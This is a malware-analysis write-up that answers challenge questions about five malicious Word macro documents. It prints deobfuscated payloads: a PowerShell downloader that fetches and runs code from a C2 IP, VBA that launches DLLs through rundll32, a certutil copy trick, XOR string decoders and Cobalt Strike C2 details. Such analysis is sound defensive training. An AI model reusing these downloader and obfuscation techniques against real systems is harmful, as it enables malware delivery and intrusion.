Squid Game

Attacker 1

01. What is the malicious C2 domain you found in the maldoc where an executable download was attempted?

We will analyze this document by using oletools.

$ oledump.py attacker1.doc 
  1:       114 '\x01CompObj'
  2:      4096 '\x05DocumentSummaryInformation'
  3:      4096 '\x05SummaryInformation'
  4:     13859 '1Table'
  5:     33430 'Data'
  6:       365 'Macros/PROJECT'
  7:        41 'Macros/PROJECTwm'
  8: M    9852 'Macros/VBA/ThisDocument'
  9:      5460 'Macros/VBA/_VBA_PROJECT'
 10:       513 'Macros/VBA/dir'
 11:       306 'MsoDataStore/ÇYÕXGNÎÕÃUKWÛÎIS2BKÍÐÐ==/Item'
 12:       341 'MsoDataStore/ÇYÕXGNÎÕÃUKWÛÎIS2BKÍÐÐ==/Properties'
 13:      4096 'WordDocument'

This stream contains an obfuscated script. At this stage, there is nothing more we can do with it.

$ oledump.py -s 8 -v attacker1.doc 
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
DBvbDlfxWGXm = WifblkBfDS + CBool(2243) + Len(ChrW(5 + 9) + ChrW(3)) + LenB(Trim("QHSiqJpWNfHbmnlvPbbP")) + Len(lZlRjJlQKnBntw)
lQbWzTrJtfhGiaS = pWNDRZbLZdGgl + CBool(5015) + Len(ChrW(1 + 1) + ChrW(2)) + LenB(Trim("XkBMzwHsSZswNPQMBDL")) + Len(SxZnBTiJkRBD)
.......

Upload the document to https://hybrid-analysis.com/. The background command is shown in detail in this report: https://hybrid-analysis.com/sample/2979b5fbb454e2f13d89e58177f8c1f881bd3f0a0bebb1d27da9e189ba9d284e/618d7f92e234d60f96658a08.

Decode the base64-encoded command:

$ echo '<base64 string from the report>' | base64 -d
$instance = [System.Activator]::CreateInstance("System.Net.WebClient");
$method = [System.Net.WebClient].GetMethods();
foreach($m in $method){

  if($m.Name -eq "DownloadString"){
    try{
     $uri = New-Object System.Uri("http://176.32.35.16/704e.php")
     IEX($m.Invoke($instance, ($uri)));
    }catch{}

  }

  if($m.Name -eq "DownloadData"){
     try{
     $uri = New-Object System.Uri("http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gas")
     $response = $m.Invoke($instance, ($uri));

     $path = [System.Environment]::GetFolderPath("CommonApplicationData") + "\\QdZGP.exe";
     [System.IO.File]::WriteAllBytes($path, $response);

     $clsid = New-Object Guid 'C08AFD90-F2A1-11D1-8455-00A0C91F3880'
     $type = [Type]::GetTypeFromCLSID($clsid)
     $object = [Activator]::CreateInstance($type)
     $object.Document.Application.ShellExecute($path,$nul, $nul, $nul,0)

     }catch{}
     
  }
}

Exit;

02. What executable file is the maldoc trying to drop?

$path = [System.Environment]::GetFolderPath("CommonApplicationData") + "\\QdZGP.exe";
[System.IO.File]::WriteAllBytes($path, $response);

03. In what folder is it dropping the malicious executable? (hint: %Folder%)

Search Google for GetFolderPath("CommonApplicationData"). Here is the link where I found the answer - https://stackoverflow.com/questions/895723/environment-getfolderpath-commonapplicationdata-is-still-returning-c-docum

%ProgramData%

04. Provide the name of the COM object the maldoc is trying to access.

Search Google for $clsid = New-Object Guid 'C08AFD90-F2A1-11D1-8455-00A0C91F3880'. Here is the link where I found the answer - https://strontic.github.io/xcyclopedia/library/clsid_c08afd90-f2a1-11d1-8455-00a0c91f3880.html

ShellBrowserWindows

05. Include the malicious IP and the php extension found in the maldoc. (Format: IP/name.php)

176.32.35.16/704e.php

06. Find the phone number in the maldoc. (Answer format: xxx-xxx-xxxx)

$ strings attacker1.doc
.....
Networked multi-state projection
West Virginia  Samanta
213-446-1757 x7135
Re-contextualized radical service-desk
Normal
 Windows
......

07. Doing some static analysis, provide the type of maldoc this is under the keyword "AutoOpen".

$ olevba -a attacker1.doc 
olevba 0.56 on Python 3.6.9 - http://decalage.info/python/oletools
===============================================================================
FILE: attacker1.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls 
in file: attacker1.doc - OLE stream: 'Macros/VBA/ThisDocument'
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |AutoOpen            |Runs when the Word document is opened        |
|Suspicious|Shell               |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|ChrW                |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |
|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
+----------+--------------------+---------------------------------------------+

08. Provide the subject for this maldoc. (make sure to remove the extra whitespace)

$ file attacker1.doc 
attacker1.doc: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: Networked multi-state projection, Subject: West Virginia  Samanta, Author: 213-446-1757 x7135, Comments: Re-contextualized radical service-desk, Template: Normal, Last Saved By:  Windows, Revision Number: 11, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Thu Apr 19 19:59:00 2018, Last Saved Time/Date: Thu Feb  7 23:45:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 7, Security: 0

09. Provide the stream number that contains a macro.

$ oletimes attacker1.doc 
oletimes 0.54 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues
===============================================================================
FILE: attacker1.doc

+----------------------------+---------------------+---------------------+
| Stream/Storage name        | Modification Time   | Creation Time       |
+----------------------------+---------------------+---------------------+
| Root                       | 2019-02-07 23:45:30 | None                |
| '\x01CompObj'              | None                | None                |
| '\x05DocumentSummaryInform | None                | None                |
| ation'                     |                     |                     |
| '\x05SummaryInformation'   | None                | None                |
| '1Table'                   | None                | None                |
| 'Data'                     | None                | None                |
| 'Macros'                   | 2019-02-07 23:45:30 | 2019-02-07 23:45:30 |
| 'Macros/PROJECT'           | None                | None                |
| 'Macros/PROJECTwm'         | None                | None                |
| 'Macros/VBA'               | 2019-02-07 23:45:30 | 2019-02-07 23:45:30 |
| 'Macros/VBA/ThisDocument'  | None                | None                |
| 'Macros/VBA/_VBA_PROJECT'  | None                | None                |
| 'Macros/VBA/dir'           | None                | None                |
| 'MsoDataStore'             | 2019-02-07 23:45:30 | 2019-02-07 23:45:30 |
| 'MsoDataStore/ÇYÕXGNÎÕÃUKW | 2019-02-07 23:45:30 | 2019-02-07 23:45:30 |
| ÛÎIS2BKÍÐÐ=='              |                     |                     |
| 'MsoDataStore/ÇYÕXGNÎÕÃUKW | None                | None                |
| ÛÎIS2BKÍÐÐ==/Item'         |                     |                     |
| 'MsoDataStore/ÇYÕXGNÎÕÃUKW | None                | None                |
| ÛÎIS2BKÍÐÐ==/Properties'   |                     |                     |
| 'WordDocument'             | None                | None                |
+----------------------------+---------------------+---------------------+

10. Provide the stream number that contains a macro.

$ oledump.py attacker1.doc 
  1:       114 '\x01CompObj'
  2:      4096 '\x05DocumentSummaryInformation'
  3:      4096 '\x05SummaryInformation'
  4:     13859 '1Table'
  5:     33430 'Data'
  6:       365 'Macros/PROJECT'
  7:        41 'Macros/PROJECTwm'
  8: M    9852 'Macros/VBA/ThisDocument'
  9:      5460 'Macros/VBA/_VBA_PROJECT'
 10:       513 'Macros/VBA/dir'
 11:       306 'MsoDataStore/ÇYÕXGNÎÕÃUKWÛÎIS2BKÍÐÐ==/Item'
 12:       341 'MsoDataStore/ÇYÕXGNÎÕÃUKWÛÎIS2BKÍÐÐ==/Properties'
 13:      4096 'WordDocument'

11. Provide the name of the stream that contains a macro.

8: M    9852 'Macros/VBA/ThisDocument'

Attacker 2

01. Provide the streams (numbers) that contain macros.

$ oledump.py attacker2.doc 
  1:       114 '\x01CompObj'
  2:      4096 '\x05DocumentSummaryInformation'
  3:      4096 '\x05SummaryInformation'
  4:      7427 '1Table'
  5:     63641 'Data'
  6:        97 'Macros/Form/\x01CompObj'
  7:       283 'Macros/Form/\x03VBFrame'
  8:     63528 'Macros/Form/f'
  9:      2220 'Macros/Form/o'
 10:       566 'Macros/PROJECT'
 11:        92 'Macros/PROJECTwm'
 12: M    6655 'Macros/VBA/Form'
 13: M   15671 'Macros/VBA/Module1'
 14: M    1593 'Macros/VBA/ThisDocument'
 15:     42465 'Macros/VBA/_VBA_PROJECT'
 16: M    2724 'Macros/VBA/bxh'
 17:      1226 'Macros/VBA/dir'
 18:      4096 'WordDocument'

02. Provide the size (bytes) of the compiled code for the second stream that contains a macro.

$ oledump.py attacker2.doc -i
  1:       114             '\x01CompObj'
  2:      4096             '\x05DocumentSummaryInformation'
  3:      4096             '\x05SummaryInformation'
  4:      7427             '1Table'
  5:     63641             'Data'
  6:        97             'Macros/Form/\x01CompObj'
  7:       283             'Macros/Form/\x03VBFrame'
  8:     63528             'Macros/Form/f'
  9:      2220             'Macros/Form/o'
 10:       566             'Macros/PROJECT'
 11:        92             'Macros/PROJECTwm'
 12: M    6655   4978+1677 'Macros/VBA/Form'
 13: M   15671  13867+1804 'Macros/VBA/Module1'
 14: M    1593    1396+197 'Macros/VBA/ThisDocument'
 15:     42465             'Macros/VBA/_VBA_PROJECT'
 16: M    2724    2397+327 'Macros/VBA/bxh'
 17:      1226             'Macros/VBA/dir'
 18:      4096             'WordDocument'

03. Provide the largest number of bytes found while analyzing the streams.

5:     63641             'Data'

04. Find the command located in the 'fun' field ( make sure to reverse the string).

$ oledump.py -s 16 -v attacker2.doc | grep fun | rev
))84(rhC ,)"cmd /k cscript.exe C:\ProgramData\pin.vbs"(esreveRrtS(llehS = nuf

05. Provide the first domain found in the maldoc.

priyacareers.com/u9hDQN9Yy7g/pt.html

06. Provide the second domain found in the maldoc.

perfectdemos.com/Gv1iNAuMKZ/pt.html

07. Provide the name of the first malicious DLL it retrieves from the C2 server.

www1.dll

08. How many DLLs does the maldoc retrieve from the domains?

5

09. Provide the path of where the malicious DLLs are getting dropped onto?

You can also view this using olevba.

$ oledump.py -s 16 -v attacker2.doc 
Attribute VB_Name = "bxh"
Sub eFile()
Dim QQ1 As Object
Set QQ1 = New Form
RO = StrReverse("\ataDmargorP\:C")
ROI = RO + StrReverse("sbv.nip")
ii = StrReverse("")
Ne = StrReverse("IZOIZIMIZI")
WW = QQ1.t2.Caption
MyFile = FreeFile
Open ROI For Output As #MyFile
Print #MyFile, WW
Close #MyFile
fun = Shell(StrReverse("sbv.nip\ataDmargorP\:C exe.tpircsc k/ dmc"), Chr(48))
End
End Sub

10. What program is it using to run DLLs?

$ olevba attacker2.doc
......
OK1 = "cmd /c rundll32.exe C:\ProgramData\www1.dll,ldr"
Ran.Run OK1, Chr(48)
OK2 = "cmd /c rundll32.exe C:\ProgramData\www2.dll,ldr"
Ran.Run OK2, Chr(48)
OK3 = "cmd /c rundll32.exe C:\ProgramData\www3.dll,ldr"
Ran.Run OK3, Chr(48)
OK4 = "cmd /c rundll32.exe C:\ProgramData\www4.dll,ldr"
Ran.Run OK4, Chr(48)
OK5 = "cmd /c rundll32.exe C:\ProgramData\www5.dll,ldr"
Ran.Run OK5, Chr(48)

11. How many seconds does the function in the maldoc sleep for to fully execute the malicious DLLs?

WScript.Sleep(15000)
OK1 = "cmd /c rundll32.exe C:\ProgramData\www1.dll,ldr"
Ran.Run OK1, Chr(48)

12. Under what stream did the main malicious script use to retrieve DLLs from the C2 domains? (Provide the name of the stream).

Macros/Form/o

Attacker 3

01. Provide the executable name being downloaded.

1.exe

02. What program is used to run the executable?

$ oledump.py -s 3 -v  attacker3.doc 
Attribute VB_Name = "T"
Sub autoopen()
LG = h("12%2%11%79%64%12%79%77%28%10%27%79%26%82%26%29%3%73%73%12%14%3%3%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%10%23%10%79%64%74%26%74%49%12%49%14%49%12%49%7%49%10%49%79%64%9%49%79%7%27%27%31%85%64%64%87%12%9%14%22%25%65%12%0%2%64%13%0%3%13%64%5%14%10%1%27%65%31%7%31%80%3%82%3%6%26%27%89%65%12%14%13%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%79%73%73%79%12%14%3%3%79%29%10%8%28%25%29%92%93%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%77")

Dim XN As New WshShell
Call XN.run("cmd /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe", 0)
Call XN.run(LG, 0)

End Sub

03. Provide the malicious URI included in the maldoc that was used to download the binary (without http/https).

8cfayv.com/bolb/jaent.php?l=liut6.cab
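
The write-up does not show how the URI was pulled out of the LG string. The following Python script is an added example, not part of the original write-up: it assumes h() is a single-byte XOR over the %-separated decimals and recovers the key from the crib "cmd", on the assumption that LG is a cmd command line like the neighbouring XN.run call. The names recover_key, decode and extract_uris are hypothetical.

```python
import re

# Argument of h() copied from the autoopen() macro shown above.
ENCODED = "12%2%11%79%64%12%79%77%28%10%27%79%26%82%26%29%3%73%73%12%14%3%3%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%10%23%10%79%64%74%26%74%49%12%49%14%49%12%49%7%49%10%49%79%64%9%49%79%7%27%27%31%85%64%64%87%12%9%14%22%25%65%12%0%2%64%13%0%3%13%64%5%14%10%1%27%65%31%7%31%80%3%82%3%6%26%27%89%65%12%14%13%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%79%73%73%79%12%14%3%3%79%29%10%8%28%25%29%92%93%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%77"


def recover_key(values, crib=b"cmd"):
    """Known-plaintext recovery of a single-byte XOR key.

    Assumption: the plaintext starts with `crib`. Raises if the crib
    is not consistent with one key byte, so a wrong guess is visible.
    """
    key = values[0] ^ crib[0]
    if any(v ^ key != c for v, c in zip(values, crib)):
        raise ValueError("crib does not fit a single-byte XOR")
    return key


def decode(encoded, crib=b"cmd"):
    """Split on '%', recover the key, return (key, decoded text)."""
    values = [int(tok) for tok in encoded.split("%")]
    if any(not 0 <= v <= 255 for v in values):
        raise ValueError("token outside byte range")
    key = recover_key(values, crib)
    return key, bytes(v ^ key for v in values).decode("ascii")


def extract_uris(text):
    """Pull http/https URIs out of the decoded command line."""
    return re.findall(r'https?://[^\s"]+', text)


if __name__ == "__main__":
    key, command = decode(ENCODED)
    print("key:", key)
    print("command:", command)
    print("uris:", extract_uris(command))
```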

04. What folder does the binary get dropped in?

Call XN.run("cmd /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe", 0)

05. Which stream executes the binary that was downloaded?

$ oledump.py attacker3.doc 
A: word/vbaProject.bin
 A1:       423 'PROJECT'
 A2:        53 'PROJECTwm'
 A3: M    2017 'VBA/T'
 A4: m    1127 'VBA/ThisDocument'
 A5:      2976 'VBA/_VBA_PROJECT'
 A6:      1864 'VBA/__SRP_0'
 A7:       190 'VBA/__SRP_1'
 A8:       348 'VBA/__SRP_2'
 A9:       106 'VBA/__SRP_3'
A10: M    1291 'VBA/d'
A11:       723 'VBA/dir'

Attacker 4

01. Provide the first decoded string found in this maldoc.

First, we analyze the document using olevba.

$ olevba attacker4.doc
......
 Set VPBCRFOQENN = CreateObject(XORI(Hextostring("3F34193F254049193F253A331522"), Hextostring("7267417269")))
......

Convert the hex strings to bytes and then XOR-decrypt with the key.

MSXML2.XMLHTTP

02. Provide the name of the binary being dropped.

    ZUWSBYDOTWV gGHBkj, Environ(XORI(Hextostring("3E200501"), Hextostring("6A654851714A64"))) & XORI(Hextostring("11371B0A00123918220E001668143516"), Hextostring("4D734243414671"))
End Sub

03. Provide the folder where the binary is being dropped to.

    ZUWSBYDOTWV gGHBkj, Environ(XORI(Hextostring("3E200501"), Hextostring("6A654851714A64"))) & XORI(Hextostring("11371B0A00123918220E001668143516"), Hextostring("4D734243414671"))
End Sub

04. Provide the name of the second binary.

Sub IOWZJGNTSGK()
gGHBkj = XORI(Hextostring("1C3B2404757F5B2826593D3F00277E102A7F1E3C7F16263E5A2A2811"), Hextostring("744F50"))

05. Provide the full URI from which the second binary was downloaded (exclude http/https).

Sub IOWZJGNTSGK()
gGHBkj = XORI(Hextostring("1C3B2404757F5B2826593D3F00277E102A7F1E3C7F16263E5A2A2811"), Hextostring("744F50"))
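
The hex-then-XOR step from question 01 can be applied to every XORI call quoted in this section. The following Python script is an added example, not part of the original write-up: it assumes XORI is a repeating-key XOR of the first Hextostring argument with the second, which is consistent with the MSXML2.XMLHTTP result above. The names xori and decode_macro are hypothetical.

```python
import re

# Macro lines copied from the olevba output for attacker4.doc on this page.
MACRO = r'''
Set VPBCRFOQENN = CreateObject(XORI(Hextostring("3F34193F254049193F253A331522"), Hextostring("7267417269")))
ZUWSBYDOTWV gGHBkj, Environ(XORI(Hextostring("3E200501"), Hextostring("6A654851714A64"))) & XORI(Hextostring("11371B0A00123918220E001668143516"), Hextostring("4D734243414671"))
gGHBkj = XORI(Hextostring("1C3B2404757F5B2826593D3F00277E102A7F1E3C7F16263E5A2A2811"), Hextostring("744F50"))
'''

# One XORI(Hextostring("data"), Hextostring("key")) call.
XORI_CALL = re.compile(
    r'XORI\(\s*Hextostring\("([0-9A-Fa-f]+)"\)\s*,'
    r'\s*Hextostring\("([0-9A-Fa-f]+)"\)\s*\)'
)


def xori(data_hex, key_hex):
    """Repeating-key XOR of two hex strings (assumed behaviour of XORI)."""
    data = bytes.fromhex(data_hex)
    key = bytes.fromhex(key_hex)
    if not key:
        raise ValueError("empty key")
    plain = bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
    return plain.decode("latin-1")


def decode_macro(source):
    """Decode every XORI call in the macro text, in order of appearance."""
    return [xori(data, key) for data, key in XORI_CALL.findall(source)]


if __name__ == "__main__":
    for decoded in decode_macro(MACRO):
        print(repr(decoded))
```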

Attacker 5

01. What is the caption you found in the maldoc?

$ strings attacker5.doc
MeIfYouCan 
   Caption         =   "CobaltStrikeIsEverywhere"
   ClientHeight    =   3015
   ClientLeft      =   120
   ClientTop       =   465
   ClientWidth     =   4560
   StartUpPosition =   1  'CenterOwner
   TypeInfoVer     =   2

02. What is the XOR decimal value found in the decoded-base64 script?

First, dump the macro with olevba. You will see a base64 string; decode it. You need to remove the . characters and the spaces. After that, we get another base64 string.

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

03. Provide the C2 IP address of the Cobalt Strike server.

Decrypt again!

176.103.56.89

04. Provide the full user-agent found.

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)

05. Provide the path value for the Cobalt Strike shellcode.

/SjMR

06. Provide the port number of the Cobalt Strike C2 Server.

8080

07. Provide the first two APIs found.

$ scdbgc -f '/home/remnux/Desktop/tryhackme/maldocs/download.dat' 
Loaded 31e bytes from file /home/remnux/Desktop/tryhackme/maldocs/download.dat
Initialization Complete..
Max Steps: 2000000
Using base offset: 0x401000

4010a2	LoadLibraryA(wininet)
4010b0	InternetOpenA()
4010cc	InternetConnectA(server: 176.103.56.89, port: 8080, )

Stepcount 2000001
